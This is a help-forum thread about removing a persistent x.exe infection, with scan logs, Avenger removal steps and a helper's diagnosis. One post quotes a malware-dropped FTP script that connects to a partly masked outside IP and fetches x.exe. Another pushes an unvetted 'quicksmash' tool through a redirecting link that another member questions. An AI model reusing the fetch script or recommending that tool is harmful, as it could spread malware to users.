Infected by x.exe more than 20 times

[RZPogi]

http://www.mediafire.com/download.php?uztmmig2yjn

for the dr web results.

I got asleep while waiting for dr. web to finish.

Most of the results are related to vtp.

[RZPogi]

http://www.mediafire.com/download.php?mni4nioljz2

for new hijackthis log

http://www.mediafire.com/download.php?jtyjy2dqymn

for combo-fix log

x.exe is still detected and that "i" trojan detected by sdfix is back and multiple IPs are blocked again at 50213.

I should change the port of utorrent.

[essexboy]

Yes I would recommend changing the port

1. Please download The Avenger2 by Swandog46 to your Desktop.

• Right click on the Avenger.zip folder and select "Extract All..."
• Follow the prompts and extract the avenger folder to your desktop
  

2. Copy all the text contained in the code box below to your Clipboard by highlighting it and pressing (Ctrl+C):

Code: [Select]

Begin copying here:

Files to replace with dummy:
c:\windows\system32\i

Files to delete:
c:\windows\IFinst27.exe
c:\windows\system32\Uharc.exe
c:\windows\system32\reico.exe

Note: the above code was created specifically for this user.  If you are not this user, do NOT follow these directions as they could damage the workings of your system.

3. Now, open the avenger folder and start The Avenger program by clicking on its icon.

• Right click on the window under Input script here:, and select Paste.
  
• You can also Paste the text copied to the clipboard into this window by pressing (Ctrl+V), or click on the third button under the menu to paste it from the clipboard.
  
• Click on Execute
  
• Answer "Yes" twice when prompted.
  

4. The Avenger will automatically do the following:

• It will Restart your computer. ( In cases where the code to execute contains "Drivers to Delete" or "Drivers to Disable", The Avenger will actually restart your system twice.)
  
• After the restart, it creates a log file that should open with the results of Avenger’s actions.  This log file will be located at  C:\avenger.txt
  
• The Avenger will also have backed up all the files, etc., that you asked it to delete, and will have zipped them and moved the zip archives to C:\avenger\backup.zip.
  

5. Please copy/paste the content of c:\avenger.txt into your reply along with a fresh Hijackthis log .

[plugplay]

I am having a problem with the same files... 

[Nicodemius]

Hi all,
I have also the same problem with "x.exe" and "quicktime.exe" located at system32 level; there's also a file called "I". When I open this file I've the following instructions in it
-------------
open 212.xxx.xxx.xx 2755
user 1 1 
get x.exe 
quit 
------------
The "get x.exe" is sometimes changed with "get y.exe"; only when the x.exe already exists.
The DwdnolleE.dll has also been found by avast in my temp files (I don't know if it is related or not?)
I've tried all the solutions mentioned above but the x.exe still reappear together with the "I" file.

If s.o. has an idea to solve this problem I'm at your disposal to give you logs, reports or whatever you need, I want to get rid of it because I'm stuck  :'(

tx Nico

[essexboy]

This one is extremely difficult to get rid of as there is within your system a randomly named ini or exe file that has to be located and deleted.  By itself the file looks and scans as totally innocuous.  The last one that  I cured was running via CMD.exe a legitimate windows file

If you start a new thread I will assist you there otherwise it could get confusing with multiple users in the same thread (for me that is   )

The initial logs that i would requires is as below: (by the way Avast sometimes gets a hissy fit with GMER)

To ensure that I get all the information this log will need to be uploaded to Mediafire and post the sharing link.

Download OTScanit  to your Desktop and double-click on it to extract the files. It will create a folder named OTScanIt on your desktop.

• Close ALL OTHER PROGRAMS.
  
• Open the OTScanit folder and double-click on OTScanit.exe to start the program.
  
• Check the box that says Scan All User Accounts
  
• Check the Radio button for Rootkit check YES
  
• Check the Radio buttons for Files/Folders Created Within 90 Days and Files/Folders Modified Within 90 Days
  
• Under Additional Scans check the following:
• File - Lop Check
• Reg - BotCheck
• File - Additional Folder Scans
• File - Purity Scan

• Now click the Run Scan button on the toolbar.
  
• Let it run unhindered until it finishes.
• When the scan is complete Notepad will open with the report file loaded in it.
  
• Click the Format menu and make sure that Wordwrap is not checked. If it is then click on it to uncheck it.
  

[Nicodemius]

Hi essexboy,

I have posted the log in this new thread: http://forum.avast.com/index.php?topic=40611.0

tx for helping us 

Nico

[t68kv]

Try using quicksmash. Just follow the quicksmash assistance instruction.

Check it here:
http://t68kv.net76.net/

If your afraid or cannot understand much about the software feel free to pm me thru instant messenger.
I already tested and remove that x.exe but of course test it first before we say it is very effective if it removed yours.

t68kv

[DavidR]

Why do you post a url that redirects to hXXp://t68kv.multiply.com/ why not just post that URL ?

I get very twitchy (especially when it is security related) when URLs I might click on redirect, other than the likes of tinyurl.com, etc. that are known redirect services.

I guess because it is on multiply, that accounts for the googleadservices.

[t68kv]

ow sorry, you ask why not use the multply url directly? Answer is to make my web account "http://t68kv.net76.net/" active and use them to update some of files used these tools "very small file storage". Not for google ads or any more purposes to earn something.



QUICKSMASH ASSISTANCE

1. Download quicksmash, after downloading open it.
2. Check "include hijackthislog", "Update Before Smashing".
3. Follow the steps on uploading the log created by the quicksmash.
   Wait for the "Finish" message, and follow the instruction on the next messageboxes.
   Usually the filename is named at the current date on you computer. EX "13-08-2008"
4. Post the link, The link must be working for fast response from the team.
5. Wait For Response Or Further Instruction From T68KV or Other Reliable Team Member.
   Usually they will tell you to redo the instruction. After Updating the Defintion.

Quicksmash
http://www.4shared.com/file/49439376/457533bb/QuickSMASH.html

[RZPogi]

that annoying x.exe is coming back after four months but now with a infected png file.

defense+ detected a buffer overflow with svchost.exe (found in system32 folder).
If I skipped the alert, the infected png file will come with x.exe .
However, terminating svchost.exe will cause the pc not to shutdown using windows. The only way to turn off the pc is to press the power button in the cpu for about 6 seconds.

Terminating svchost is a better option than becoming infected.
Well, I think that this problem is solved for now.